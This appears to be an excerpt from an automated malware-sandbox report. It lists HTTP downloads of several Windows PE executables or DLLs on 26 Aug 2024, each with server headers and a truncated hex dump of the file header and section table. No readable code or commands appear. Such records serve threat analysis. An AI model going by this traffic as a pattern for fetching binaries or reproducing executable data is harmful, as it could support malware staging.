c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 26 Aug 2024 21:29:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 26 Aug 2024 21:29:26 GMTContent-Type: application/octet-streamContent-Length: 1146632Last-Modified: Sat, 10 Aug 2024 22:51:40 GMTConnection: keep-aliveETag: "66b7eefc-117f08"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 c0 10 00 00 04 00 00 dc 84 11 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 02 a9 00 00 00 00 00 00 00 00 00 00 80 50 11 00 88 2e 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 02 a9 00 00 00 00 10 00 00 aa 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 b0 10 00 00 10 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 26 Aug 2024 21:29:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 26 Aug 2024 21:29:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 26 Aug 2024 21:29:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 26 Aug 2024 21:29:29 GMTContent-Type: application/octet-streamContent-Length: 114176Last-Modified: Sun, 25 Aug 2024 17:47:53 GMTConnection: keep-aliveETag: "66cb6e49-1be00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d4 1d e4 63 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 16 01 00 00 a6 00 00 00 00 00 00 4e 34 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 02 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 33 01 00 4f 00 00 00 00 40 01 00 98 a3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 14 01 00 00 20 00 00 00 16 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 a3 00 00 00 40 01 00 00 a4 00 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 02 00 00 02 00 00 00 bc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 34 01 00 00 00 00 00 48 00 00 00 02 00 05 00 50 79 00 00 ac ba 00 00 01 00 00 00 30 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 57 00 07 80 c2 18 00 48 33 c0 c3 00 00 00 00 b8 57 00 07 80 c3 00 00 33 c0 c2 14 00 00 00 00 2e 00 2f 00 5c 00 00 00 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 9e 7e 01 00 00 04 28 1b 00 00 0a 39 11 00 00 00 02 7e 01 00 00 04 28 1c 00 00 0a 28 0b 00 00 06 2a 02 28 09 00 00 06 2a 6e 7e 01 00 00 04 28 1d 00 00 0a 7e 01 00 00 04 02 28 0a 00 00 06 28 1e 00 00 0a 2a 9e 72 01 00 00 70 02 28 01 00 00 06 02 28 03 00 00 06 8c 40 00 00 01 02 28 05 00 00 06 8c 41 00 00 01 28 1f 00 00 0a 2a 66 02 7e 23 00 00 0a 7d 04 00 00 04 02 1b 7d 05 00 00 04 02 28 24 00 00 0a 2a 1e 02 28 24 00 00 0a 2a f2 7e 0f 00 00 04 25 3a 17 00 00 00 26 7e 0e 00 00 04 fe 06 2f 00 00 06 73 4d 00 00 0a 25 80 0f 00 00 04 73 4e 00 00 0a 28 4f 00 00 0a 7e 0b 00 00 04 28 16 00 00 06 80 0c 00 00 04 2a c2 7e 09 00 00 04 6f 05 00 00 06 39 20 00 00 00 7e 02 00 00 04 02 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 26 Aug 2024 21:29:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 